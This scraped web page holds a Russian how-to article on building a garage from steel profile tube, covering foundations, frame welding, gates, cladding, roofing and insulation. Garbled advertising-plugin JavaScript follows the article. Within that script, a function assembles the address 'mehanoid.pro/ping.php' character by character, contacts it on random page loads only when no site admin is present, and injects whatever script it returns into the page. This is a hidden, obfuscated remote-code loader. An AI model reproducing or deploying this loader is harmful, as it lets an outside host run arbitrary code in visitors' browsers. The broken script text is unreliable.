Создавая гараж из профильной трубы, чертеж должен предусматривать небольшой выпуск кровельного материала крыши за наружные стены гаража, для того, чтобы дождевая или талая вода не стекали по стенам на фундамент. Рекомендуется по краю крыши установить специальные отливы, которые будут отводить дождевую воду в специальный резервуар для дальнейшего её использования в бытовых нуждах или для мойки автомобиля.

Наружная обшивка каркасного гаража

Для наружной облицовки можно использовать сайдинговые панели или профнастил. Для укладки сайдинговых или пластиковых панелей потребуется обшивка каркаса плитами OSB, которые будут не только служить основой для облицовочного материала, но и выступят в роли дополнительной звуковой и теплоизоляции.

Металлический каркас даёт возможность владельцу гаража развивать фантазию по собственному усмотрению и использовать для декорации различные виды материалов. В заключение предлагаем просмотреть видео материал о строительстве каркасного гаража.

Источник: https://1pogarazham.ru/stroitelstvo/kakie-vidy/323-garazh-iz-truby

Строим гараж из профильной трубы своими руками

Гараж из профильной трубы – это современный вариант постройки сооружения, служащего для стоянки и ремонта различной техники.

В основу сооружения подобного типа, положена каркасная конструкция, изготавливаемая из профильной металлической трубы.

Преимущества и недостатки каркасной конструкции

Монтировать каркас можно и зимой

Каркасная технология строительства различных зданий и сооружений широко распространена как в жилищном и промышленном строительстве, так и при возведении вспомогательных объектов, к которым можно отнести и гаражные постройки.

У каркасной технологии строительства, при использовании металлических профилированных труб, есть свои достоинства и недостатки, которые определяют возможность использования таких конструкций, в тех или иных условиях выполнения строительно-монтажных работ и эксплуатации готового объекта строительства.

Плюсами данной технологии являются:

  • Относительно низкая стоимость строительства, в сравнении с вариантами, когда используется кирпич, бетон или сендвич-панели.
  • Малые сроки выполнения строительно-монтажных работ.
  • Возможность выполнения работ своими руками.
  • Отсутствие необходимости в привлечении специальной строительной техники.
  • Продолжительные сроки эксплуатации.
  • Все сезонность выполнения работ.
  • Отсутствует эффект усадки строительных конструкций.
  • Малые трудозатраты.
  • Отсутствует необходимость в сооружении сложных и дорогих фундаментов.

Недостатками можно считать:

  1. Сложность самостоятельной разработки узловых соединений, обеспечивающих необходимую прочность и жесткость конструкции.
  2. Стоимость каркаса, изготовленного из профильной трубы, выше стоимости аналогичной конструкции, изготовленной из дерева.
  3. Каркас, изготовленный из металла, требует качественной теплоизоляции, т.к. металлический профиль является «мостиком холода».

Проектирование конструкции

Для того, чтобы избежать ошибок при строительстве каркасного гаража лучше всего обратиться к профессионалам, которые смогут разработать комплект чертежей данного сооружения. В состав такого проекта войдут, кроме общего плана и фасада сооружаемого объекта, чертежи узловых соединений, являющихся наиболее важными элементами конструкции.

В случае, если принято решение о самостоятельной разработке эскиза гаража, то необходимо обратить внимание на следующие моменты, а именно:

  • Сечение профильной трубы должно соответствовать нагрузкам, которые прилагаются к каждому конкретному элементу каркаса.
  • Узловые соединения должны быть тщательно проработаны, для того, чтобы прочность конструкции соответствовала предъявляемым требованиям.
  • План гаража, его габаритные размеры, должны соответствовать габаритам транспортного средства и прочим зонам, необходимым при его использовании (хранение материалов, ремонт и т.д.).
  • Фундамент гаража, должен соответствовать характеру грунтов в месте расположения сооружения и его весу.
  • Расположение гаража на плане местности, должно соответствовать требованиям регламентирующих документов, определяющим габариты до рядом расположенных зданий и сооружений, а также проезжих дорог и инженерных сетей.
  • На стадии проектирования должны быть проработаны вопросы по устройству цоколя или ростверка сооружаемого объекта, типа кровли и материала ее покрытия.
  • Необходимо выбрать материалы для утепления и гидроизоляции конструкций, а также для зашивки и отделки внутренних и наружных стен каркаса.

При проектировании гаража, выборе его геометрических размеров, нужно следовать принципам:

  1. Ширина гаража должна быть на 1,5 – 2,0 метра больше, чем ширина транспортного средства.
  2. Длина – должна быть больше длины транспортного средства на 2,0 – 2,5 метра.
  3. Высота – должна быть больше высоты багажника транспортного средства, в открытом состоянии.

Необходимые инструменты и материалы

Профилированная труба

Когда проект (эскиз) разработан, следующим этапом выполнения работ, будет приобретение выбранных материалов и подготовка необходимого инструмента.

Для монтажа фундамента, в зависимости от его конструкции, понадобится кирпич и цементный раствор, бетон, винтовые сваи или ж/б плиты.

Для изготовления каркаса – металлическая профильная труба сечением 100х100, 100х80, 60х60 и 60х40 мм, а также листовой металл толщиной 4,0 мм.

Для обшивки каркаса – листы ОСБ, фанера или профилированный металлический лист, а также вагонка и сайдинг.

Для утепления – минеральная вата или пенопласт, для гидроизоляции – рубероид.

Для выполнения работ понадобятся: сварочное оборудование, углошлифовальная машинка («болгарка»), шуруповерт, слесарный инструмент и крепежные элементы.

Строительство каркасного гаража из профильной трубы своими руками

Все работы по строительству гаража можно разбить на несколько этапов: сооружение фундамента и пола, монтаж каркаса, установка ворот, обшивка конструкции, монтаж кровли и работы по утеплению.

Вне зависимости от вида фундамента и его конструкции, все работы на данном этапе начинаются с выполнения разметки на выбранной площадке строительства.

Для разметки используется нивелир или теодолит, а при их отсутствии – рулетка, мерная лента и строительный уровень.

Важно

Разметка начинается с одного из углов строящегося объекта, место расположение которого определяется по отношению к рядом стоящим зданиям или иным капитальным объектам и конструкциям.

Все остальные точки (углы), размечаются относительно этого угла, с таким расчетом, чтобы диагонали между противоположно расположенными – были идентичны.

Когда места определены и отмечены на местности, необходимо разметить прочие элементы фундамента, которые зависят от его конструкции.

Для каркасного гаража сооружаются фундаменты следующих типов:

  • Плитный – когда под всю площадь сооружаемого строения заливается монолитная плита толщиной 150 – 200 мм.

В этом случае фундамент является мелко-заглубленным, он состоит из арматурного каркаса, который залит бетонным раствором.

Перед заливкой площадка (основание) выравнивается, плодородный слой грунта при этом снимается. На подготовленной поверхности настилается песчаная подушка и устанавливается опалубка, в которой и монтируется арматурный каркас. Вся поверхность заливается бетоном.

При данной конструкции фундамента дополнительная разметка, на подготовительном этапе производства работ, не производится – достаточно разметить углы, а сам фундамент, кроме своей основной функции, является полом гаража.

При такой конструкции фундамента, придется сделать дополнительную разметку, которая определит ширину ленты.

Для этого можно воспользоваться мерной лентой или шнуром, которые закрепляются на разметочные обноски, устанавливаемые в углах фундамента.

Разметочная обноска представляет из себя П-образную конструкцию из пиломатериала, в которой «ноги» выполнены в виде кольев или досок с заостренными концами, а перекладина – из обрезной доски.

Выполнив разметку ленты, снимается грунт на заданную глубину. На дно образовавшейся траншеи укладывается песчаная подушка и устанавливается опалубка.

Совет

Во внутренне пространство опалубки монтируется арматурный каркас и заливается бетон.

При устройстве фундамента подобного типа, пол в гараже может быть выполнен с использованием пиломатериалов, утрамбованного грунта или в виде отдельной бетонной плиты, жестко не связанной с фундаментом.

Эта конструкция фундамента требует разметки мест установки дополнительных свай, которые монтируются в воротах гаража, а также на длинных стеновых прогонах.

В местах их расположения необходимо снять грунт на требуемую глубину и устроить песчаную подушку. В дальнейшем работы выполняются, как и выше рассмотренном случае монолитного ленточного фундамента.

При использовании кирпича или блоков, из которых выкладываются столбики – после устройства песчаной подушки заливается бетонная подготовка, на которой и выкладываются столбы нужного размера (1,5 х 1,5 или 2,0 х 2, 0 кирпича).

Пол изготавливается, как и в варианте ленточного фундамента.

  • Свайный, с использованием винтовых свай.

Это новый вид фундаментов, который широко используется при возведении легких построек.

Разметка и устройство полов выполняются аналогично варианту свайного столбчатого фундамента, а работа заключается в использовании винтовых свай заводского производства.

Сваи ввертываются в грунт в местах, определенных разметкой, а их оголовки, после их завинчивания, обрезаются в одной плоскости.

Обратите внимание

По верху свай монтируется ростверк, который изготавливается из швеллера или иного металлопроката, обеспечивающего прочность конструкции.

Для всех вариантов фундамента важным условием успешного строительства и безаварийной эксплуатации сооружаемого объекта, будет обеспечение расположения элементов фундамента, его верхних точек, в одной горизонтальной плоскости.

Монтаж каркаса

Монтаж косынок – усилителей крыши

Когда фундамент готов можно приступать к монтажу каркаса гаража.

Для изготовления столбов, а также верхней и нижней обвязок используется труба большего сечения (100 х 100, 100 х 80 мм), а для раскосов и распорок – меньшего сечения.

Перед началом монтажа используемая труба нарезается в соответствии с требуемыми размерами и в нужном количестве, после чего заготовки обрабатываются антикоррозийными составами.

Из металлического листа нарезаются «косынки» и прочие элементы, обеспечивающие прочность собираемой конструкции.

Сборка каркаса начинается с монтажа нижней обвязки, под которую, предварительно, укладывается слой гидроизоляции. При устройстве данного элемента необходимо обратить внимание на плоскость размещения обвязки, она должна быть строго параллельно поверхности земли. Кроме этого, диагонали между разно расположенными углами, должны быть идентичны.

Нижняя обвязка жестко закрепляется к фундаменту, для этого используются анкерные болты или применяется электродуговая сварка, посредством которой каркас приваривается к закладным деталям, расположенным в элементах фундамента.

Далее выполняется монтаж вертикальных колонн (столбов). Столбы крепятся при помощи сварки или на болтовое соединение, при этом используются «косынки» и прочие пластины крепления. При монтаже необходимо следить за плоскостью, в которой монтируются колонны, они должны быть расположены строго вертикально по отношению к поверхности земли.

Важно

Когда столбы установлены монтируется верхняя обвязка и элементы каркаса кровли. Крепление выполняется аналогично креплению нижней обвязки и столбов.

После того, как каркас собран, осуществляется проварка всех узлов и мест соединения элементов конструкции каркаса.

Установка ворот

Установка ворот из профилированной трубы и уголка

Тип и конструкция ворот каркасного гаража может быть различна, что определяется местом его расположения (наличие электрических сетей), финансовых возможностей и личных предпочтений пользователя.

Наиболее простой вариант – это каркасная конструкция, когда ворота изготавливаются из профильной трубы, аналогичной той, что использовалась при изготовлении каркаса гаража.

Для этих целей используется труба сечением 60 х 60 мм, из которой делаются створки ворот и входной двери, если таковая требуется.

К каркасу воротных створок привариваются гаражные петли, после чего полученная конструкция монтируется на столбы проема гаражных ворот.

Обшивка конструкции

Обшивка каркаса может выполняться различными способами, которые зависят от материала используемого для этого.

Если используется профилированный лист, то его размечают требуемой длины, после чего он режется и монтируется на каркас посредством саморезов по металлу.

Профилированным листом можно обшить стены, ворота и кровлю.

Совет

Если используется листовой пиломатериал, фанера, ДСП или ОСБ-листы, то они обшиваются с наружной стороны каркаса. Крепления выполняется саморезами или используется болтовое соединение.

С внутренней стороны каркас обшивается после выполнения работ по утеплению, для этого применяется тот же листовой пиломатериал или вагонка.

С наружной стороны, по листовому материалу, гараж может быть обшит вагонкой или сайдингом.

Монтаж кровли

Кровля гаража из профнастила

В случае использования пиломатериалов для обшивки каркасной конструкции, работа по устройству кровли заключается в устройстве обрешетки, которая выполняется из досок, укладываемых на элементы каркаса крыши гаража.

Форма крыши может быть односкатной или двухскатной, в зависимости от предпочтений пользователя, места расположения гаража и общего дизайна окружающего пространства.

По уложенной обрешетке укладывается гидроизоляция и кровельный материал.

Вид кровельного материала может быть различным, в зависимости от предпочтений пользователя и его финансовых возможностей.

Утепление гаража

Работы по утеплению смонтированного гаража заключаются в укладке во внутренне пространство каркаса утеплителя.

Как уже было написано выше, в качестве утеплителя может быть использована минеральная вата, пенопласт, пеноизол или пенополиуретан.

Каждому из этих материалов свойственны определенные достоинства и недостатки, определяющие сферу его применения и последовательность выполнения работ.

Важным условием успешной эксплуатации теплоизоляционных материалов является устройство гидроизоляции, как по отношению к фундаменту, так и в вертикальной плоскости стен гаража.

Для гидроизоляции используется рубероид или пленка, а также специальные мембраны, обеспечивающие требуемые параметры эксплуатации теплоизолирующих материалов.

Каркасный гараж из профильной трубы может смонтировать каждый желающий, для этого необходимо лишь знать некоторые нюансы выполнения работ, о которых было написано выше, и уметь работать со сварочным оборудованием и ручным инструментом.

Источник: https://okarkasnih.ru/garazh-iz-profilnoj-truby/

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};